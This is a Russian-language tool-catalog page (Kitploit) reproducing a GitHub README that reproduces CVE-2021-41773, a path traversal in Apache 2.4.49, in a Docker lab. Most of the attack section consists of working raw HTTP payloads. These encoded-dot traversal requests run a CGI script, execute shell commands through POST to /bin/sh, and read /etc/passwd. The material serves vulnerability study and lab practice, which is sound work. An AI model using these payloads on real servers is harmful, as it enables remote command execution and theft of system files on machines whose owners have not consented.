Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-41773 — Воспроизведение CVE-2021-41773 | Kitploit
Инструменты/GitHubGitHub/1nhann/cve-2021-41773
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHub1nhann/cve-2021-41773

CVE-2021-41773

Воспроизведение CVE-2021-41773

Репозиторий
94134 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Воспроизведение CVE-2021-41773

https://www.tenable.com/blog/cve-2021-41773-path-traversal-zero-day-in-apache-http-server-exploited

Уязвимость, характерная для Apache v2.4.49. В ранних версиях не было функции ap_normalize_path, она была введена в версии v2.4.49. Именно эта функция привела к обходу директорий. Исправлено в v2.4.50.

Окружение

https://github.com/1nhann/CVE-2021-41773

В данном окружении загружен модуль CGI:

root@kitploit:~
LoadModule cgi_module modules/mod_cgi.so
root@kitploit:~
root@ubuntu:~/$ git clone https://github.com/1nhann/CVE-2021-41773.git
root@ubuntu:~/$ cd CVE-2021-41773
root@ubuntu:~/CVE-2021-41773$ docker build -t cve .
root@ubuntu:~/CVE-2021-41773$ docker run -d -p 12345:80 cve

Внутри контейнера: image-20211006213843476

POC

root@kitploit:~
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bash.cgi HTTP/1.1
Host: 127.0.0.1:12345
User-Agent: curl/7.68.0
Accept: */*
Connection: close


image-20211006210008166

Выполнил /bash.cgi из корневой директории.

Получение оболочки

Просмотр документации Apache по CGI:

STDIN и STDOUT

Другое взаимодействие между сервером и клиентом происходит через стандартный ввод (STDIN) и стандартный вывод (STDOUT). В обычном контексте STDIN означает клавиатуру или файл, который программа должна обработать, а STDOUT обычно означает консоль или экран.

Когда вы отправляете POST форму в CGI-программу, данные этой формы упаковываются в специальный формат и передаются вашей CGI-программе через STDIN. Затем программа может обрабатывать эти данные так, как если бы они поступали с клавиатуры или из файла.

«Специальный формат» очень прост. Имя поля и его значение соединяются знаком равенства (=), а пары значений соединяются амперсандом (&). Неудобные символы, такие как пробелы, амперсанды и знаки равенства, преобразуются в их шестнадцатеричный эквивалент, чтобы они не нарушали работу. Вся строка данных может выглядеть примерно так:

root@kitploit:~
name=Rich%20Bowen&city=Lexington&state=KY&sidekick=Squirrel%20Monkey

То есть параметры, переданные через POST, передаются в качестве содержимого stdin CGI-программе, к которой осуществляется доступ.

Если обратиться к /bin/sh, то можно сразу получить оболочку.

POC:

root@kitploit:~
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 127.0.0.1:12345
User-Agent: curl/7.68.0
Accept: */*
Content-Length: 22
Content-Type: application/x-www-form-urlencoded
Connection: close

data=;touch /tmp/pwned

image-20211006213421718

Также возможен непосредственный вывод результата выполнения команды:

POC:

root@kitploit:~
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 127.0.0.1:12345
User-Agent: curl/7.68.0
Accept: */*
Content-Length: 22
Content-Type: application/x-www-form-urlencoded
Connection: close

echo Content-Type: text/plain; echo; id

Чтение произвольных файлов

Если модуль CGI не загружен, файл не будет выполнен:

root@kitploit:~
 #LoadModule cgi_module modules/mod_cgi.so

POC:

root@kitploit:~
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 127.0.0.1:12345
User-Agent: curl/7.68.0
Accept: */*
Connection: close


image-20211006232521116

Скачать инструмент